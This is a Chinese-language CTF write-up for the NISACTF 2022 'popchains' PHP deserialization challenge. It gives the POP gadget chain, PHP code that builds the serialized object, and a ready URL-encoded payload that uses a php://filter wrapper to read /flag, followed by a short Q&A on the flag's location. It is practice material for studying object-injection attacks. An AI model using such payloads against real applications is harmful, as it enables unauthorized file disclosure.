NISACTF 2022popchains
一、解题流程
1、链条:Road_is_Long(construct->wakeup【page=$r】-> toString【string=$m】)-> Make_a_Change(construct->get【effort=$t】)-> Try_Work_Hard(invoke->append【var='php://filter/read=convert.base64-encode/resource=/flag'】)
2、根据链条:编写代码
php
<?php
class Road_is_Long{
public $page;
public $string;
}
class Try_Work_Hard{
protected $var = "php://filter/read=convert.base64-encode/resource=/flag";
}
class Make_a_Change{
public $effort;
}
$r = new Road_is_Long();
$t = new Try_Work_Hard();
$m = new Make_a_Change();
$r->page=$r;
$r->string=$m;
$m->effort=$t;
//echo serialize($r);
echo urlencode(serialize($r));
?>3、payload=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Br%3A1%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A54%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D
4、通过payload得到flag的base64编码,解密得到flag即可
二、小小疑惑
疑问:/flag能获取是因为在根目录下吗?为什么写/flag.php就不行?如果对.过滤的话,应该会echo "You can Not Enter 2022";才对啊?
解答:这道题是2022年出的,这道题目下方提示flag.php文件,说明flag.php在当前目录下,但是答案是在根目录下,且是flag文件,所以个人认为是后面这台环境变了的问题。